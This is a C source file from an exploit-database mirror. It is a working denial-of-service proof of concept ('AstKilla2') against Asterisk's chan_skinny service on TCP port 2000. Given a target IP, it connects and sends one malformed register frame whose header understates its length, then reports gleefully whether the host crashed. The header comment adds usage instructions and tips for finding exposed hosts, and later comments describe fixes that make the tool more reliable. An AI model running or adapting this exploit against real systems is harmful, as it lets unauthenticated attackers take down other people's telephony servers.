exploit-db-mirror/platforms/multiple/dos/4196.c
/*
* AstKilla2.c
* gcc -o astkilla2 astkilla2.c
* ./astkilla2 -h 216.246.**.***
* In no event will the author of this source be liable for any loss or damage of a material or
* immaterial nature arising from access to, use or non-use of published information, or from misuse of the connection or technical faults.
 * chan_skinny listens on 2000/TCP. If you find a host with that port open there is a decent chance it is an Asterisk
 * machine whose admin forgot to disable chan_skinny (it is loaded by default; e.g. `noload => chan_skinny.so` in
 * modules.conf turns it off). This should be a lesson to all of those who don't lock down what they don't need
 * (what is this, 1999?).
 * This is really quite old, but as it turns out someone made the bug public, how sad.. but eh, there are more fish in the sea ;)
 * Well, here is an exploit for everyone who didn't take a look at the code. Note that the only thing it does is
 * send one malformed frame and watch whether the connection survives; it needs no credentials.
-- = fbff = --
*/
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
/* TCP port chan_skinny listens on; skinny_client_connect() dials this port. */
#define SKINNY_TCP_PORT 2000
/* Size of the rhost/username/password buffers in struct skinny_client. */
#define CLEN 1024
/* Size of the per-client packet buffer and of the receive buffer in skinny_client_read(). */
#define SKINNY_MAX_SIZE 1000
/* Message type placed (via htonl) in the frame header by skinny_client_register(). */
#define REGISTER_MESSAGE 0x0001
/*
 * Body of the register message built by skinny_client_register(). Only name
 * and type are assigned there; the struct is handed to the sender as raw
 * bytes, in host byte order (no htonl() is applied to any field).
 */
struct register_message {
char name[16]; /* device name; register() stores "SEP0007EB463101" here */
uint32_t userId;
uint32_t instance;
uint32_t ip;
uint32_t type; /* set to 30006 by skinny_client_register() */
uint32_t maxStreams;
};
/*
 * Per-target client state. rhost is filled by main() from the -h argument;
 * sd, saddr and active are set by skinny_client_connect(). username,
 * password and packet are never referenced anywhere in this file.
 */
struct skinny_client {
int sd; /* TCP socket to the target, see skinny_client_connect() */
struct sockaddr_in saddr; /* target address, port SKINNY_TCP_PORT */
int active; /* set to 1 once connect() succeeded */
char rhost[CLEN]; /* target address string from the -h argument */
char username[CLEN];
char password[CLEN];
char packet[SKINNY_MAX_SIZE];
};
/*
 * One outgoing skinny frame. The first three ints are the 12-byte wire
 * header that skinny_client_sendmessage() copies out in host byte order
 * (this relies on 4-byte ints with no padding between them); data points
 * at the payload that follows the header and is not owned by this struct.
 */
struct skinny_client_message {
int len; /* advertised payload length; sendmessage() overwrites it with 3 before sending */
int res;
int e; /* message type, e.g. htonl(REGISTER_MESSAGE); len+res+e = 12 bytes */
char *data; /* payload bytes copied after the header */
};
struct skinny_client *g_sc; /* global client handle; never referenced -- main() uses a local instead */
/*
 * Table of known reply message types with a human-readable name and an
 * optional handler. Every handler is NULL and no code in this file
 * dispatches through the table; replies are never parsed.
 */
struct messages {
int e; /* message type as it appears on the wire */
char *human; /* printable name, newline included */
int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm);
} message_list[] = {
{0x81,"Register Ack Message\n", NULL},
{0x9b,"Capabilities Request Message\n",NULL},
{0x9f,"Reset Message\n", NULL}
};
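/*
 * Read one reply from the remote skinny node and report what it implies
 * about the host's state. The reply contents are not parsed.
 *
 * Outcomes:
 *   read() fails      -> connection error (typically a reset); reported as
 *                        the host being dead, returns -1.
 *   read() returns 0  -> the peer closed the connection without answering.
 *                        The original fell through to the "too little data"
 *                        branch here, although a closed socket is the more
 *                        likely result of a crash; reported separately,
 *                        returns -1.
 *   < 12 bytes        -> partial reply (less than the header sendmessage()
 *                        writes), returns 0. The original compared against
 *                        sizeof(struct skinny_client_message) - 4, which
 *                        includes the data pointer and varies with the ABI.
 *   >= 12 bytes       -> the node answered, returns 0.
 */
int skinny_client_read(struct skinny_client *sc)
{
	enum { SKINNY_HDR_LEN = 12 }; /* len + res + e as written by sendmessage() */
	char buf[SKINNY_MAX_SIZE];
	ssize_t ret;
	int err;

	memset(buf, 0x00, sizeof(buf));
	ret = read(sc->sd, buf, sizeof(buf));
	if (ret == -1) {
		err = errno; /* printf() may clobber errno */
		printf("+++ GOOD NEWS THE REMOTE HOST IS DEAD! READ RETURNED -1 AND THE TCP CONNECTION HAS WENT BYEBYE\n");
		printf("    read: %s\n", strerror(err));
		return -1;
	}
	if (ret == 0) {
		printf("+++ GOOD NEWS THE REMOTE HOST CLOSED THE CONNECTION WITHOUT ANSWERING (LIKELY DOWN)\n");
		return -1;
	}
	if ((size_t)ret < SKINNY_HDR_LEN) {
		printf("we got some data back from the server just to little of it!\n");
	} else {
		printf("++++ THINGS BROKE BUT THE HOST MAY STILL BE UP. HOW SAD\n");
	}
	return 0;
}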
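/*
 * Serialise scm into one fixed 90-byte skinny frame and write it to sc->sd.
 *
 * Frame layout: the three header ints (len, res, e) copied field by field in
 * host byte order -- byte-identical to the original's memcpy of the struct's
 * first 12 bytes on any ABI with 4-byte ints -- followed by payload bytes
 * from scm->data up to the 90-byte total. scm->len is forced to 3 first, so
 * the header advertises far less than what actually follows; that mismatch
 * is the point of this PoC and is deliberately kept. The original's 0x41
 * fill of the buffer was entirely overwritten and is dropped.
 *
 * scm->data must point at at least 78 readable bytes: the original copied
 * exactly that many regardless of scm->len, and so does this.
 *
 * Fixes over the original: no heap allocation (the 90-byte buffer was
 * leaked), and the write() result is checked rather than only printed.
 *
 * Returns 0 when the whole frame was written, -1 on a failed or short write.
 */
int skinny_client_sendmessage(struct skinny_client *sc, struct skinny_client_message *scm)
{
	enum { FRAME_LEN = 90 };
	unsigned char outbuf[FRAME_LEN];
	size_t off = 0;
	ssize_t res;
	int err;

	scm->len = 3;

	/* header */
	memcpy(outbuf + off, &scm->len, sizeof(scm->len));
	off += sizeof(scm->len);
	memcpy(outbuf + off, &scm->res, sizeof(scm->res));
	off += sizeof(scm->res);
	memcpy(outbuf + off, &scm->e, sizeof(scm->e));
	off += sizeof(scm->e);
	/* payload fills the remainder of the frame */
	memcpy(outbuf + off, scm->data, FRAME_LEN - off);

	res = write(sc->sd, outbuf, FRAME_LEN);
	err = errno; /* save before printf() can clobber it */
	printf("++ Wrote %i bytes\n", (int)res);
	if (res != FRAME_LEN) {
		if (res == -1) {
			printf("++ write failed: %s\n", strerror(err));
		} else {
			printf("++ short write, frame not fully sent\n");
		}
		return -1;
	}
	return 0;
}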
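/*
 * Build the register message, send it to the remote skinny node and read
 * the reply once to see whether the host survived.
 *
 * Fixes over the original: the payload used to be a heap block of
 * sizeof(struct register_message) bytes whose pointer was then advanced by
 * 4, which both defeated the NULL check (NULL + 4 is never NULL) and made
 * the buffer 4 bytes shorter, while skinny_client_sendmessage() copies 78
 * bytes from it -- i.e. it read well past the allocation and sent heap
 * garbage (the block was also never freed). The payload now lives in a
 * zeroed SKINNY_MAX_SIZE stack buffer, so the deterministic bytes (header,
 * name, type) are unchanged on the wire and everything else is sent as
 * zeros instead of whatever memory happened to hold.
 *
 * Returns 0 on success, -1 if the message could not be written.
 */
int skinny_client_register(struct skinny_client *sc)
{
	struct skinny_client_message scm;
	struct register_message rm;
	unsigned char payload[SKINNY_MAX_SIZE];

	memset(&scm, 0, sizeof(scm));
	memset(&rm, 0, sizeof(rm));
	memset(payload, 0, sizeof(payload));

	/* 15 characters plus NUL fill name[16] exactly */
	strcpy(rm.name, "SEP0007EB463101\x00");
	/* Left in host byte order as in the original. Skinny's wire format is,
	 * as far as I know, little-endian, so this only reads as 30006 on LE
	 * hosts -- presumably irrelevant to the crash, but worth knowing. */
	rm.type = 30006;
	memcpy(payload, &rm, sizeof(rm));

	scm.len = htonl(sizeof(rm)); /* overwritten with 3 by sendmessage() */
	scm.e = htonl(REGISTER_MESSAGE);
	scm.data = (char *)payload;

	if (skinny_client_sendmessage(sc, &scm) != 0) {
		printf("+++ could not write the register message\n");
		return -1;
	}
	skinny_client_read(sc);
	return 0;
}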
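/*
 * Open a TCP connection to sc->rhost on SKINNY_TCP_PORT.
 *
 * sc->rhost is parsed with inet_aton(), which accepts the same numeric
 * forms inet_addr() did; host names are not resolved. The original never
 * checked inet_addr() for INADDR_NONE, so a typo silently connected to
 * 255.255.255.255 -- an invalid address is now rejected before any socket
 * is opened. On success sc->sd holds the connected socket and sc->active
 * is set to 1.
 *
 * Returns 0 on success, -1 on a bad address or a socket()/connect()
 * failure; in the failure cases the descriptor is closed (the original
 * leaked it) and sc->sd is reset to -1.
 */
int skinny_client_connect(struct skinny_client *sc)
{
	memset(&sc->saddr, 0, sizeof(sc->saddr));
	sc->saddr.sin_family = AF_INET;
	sc->saddr.sin_port = htons(SKINNY_TCP_PORT);
	if (inet_aton(sc->rhost, &sc->saddr.sin_addr) == 0) {
		printf("+++ '%s' IS NOT A VALID IPv4 ADDRESS\n", sc->rhost);
		sc->sd = -1;
		return -1;
	}

	sc->sd = socket(AF_INET, SOCK_STREAM, 0);
	if (sc->sd == -1) {
		printf("+++ socket: %s\n", strerror(errno));
		return -1;
	}

	if (connect(sc->sd, (struct sockaddr *)&sc->saddr, sizeof(sc->saddr)) != 0) {
		printf("+++ UNABLE TO CONNECT TO REMOTE HOST 2000/TCP!\n");
		close(sc->sd);
		sc->sd = -1;
		return -1;
	}
	printf("+++ CONNECTION OK\n");
	sc->active = 1;
	return 0;
}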
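/*
 * Entry point: parse "-h <ipv4>", connect to 2000/TCP and fire the register
 * message.
 *
 * Fixes over the original: "-h" as the last argument indexed argv[argc]
 * (NULL) and crashed in strcpy(); the host string is now copied bounded
 * into rhost; the unused pthread_attr_t is gone; the allocation is checked;
 * a failed connect no longer proceeds to write on a dead descriptor; the
 * socket and the client struct are released before exit.
 *
 * Exit status is 0 when the message was sent, 1 on usage, memory or
 * connection errors (the original always returned 0).
 */
int main(int argc, char **argv)
{
	struct skinny_client *sc;
	int i;
	int rc = 1;

	sc = calloc(1, sizeof(*sc));
	if (!sc) {
		printf("+++ out of memory\n");
		return 1;
	}
	sc->sd = -1;

	/* -h takes a value: stop one short so argv[i + 1] is always valid */
	for (i = 1; i + 1 < argc; i++) {
		if (strcmp(argv[i], "-h") == 0) {
			snprintf(sc->rhost, sizeof(sc->rhost), "%s", argv[i + 1]);
		}
	}
	if (sc->rhost[0] == '\0') {
		printf("+++ You must run with the -h option\n");
		goto out;
	}

	if (skinny_client_connect(sc) != 0) {
		goto out;
	}
	skinny_client_register(sc);
	rc = 0;

out:
	if (sc->sd != -1) {
		close(sc->sd);
	}
	free(sc);
	return rc;
}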
// milw0rm.com [2007-07-18]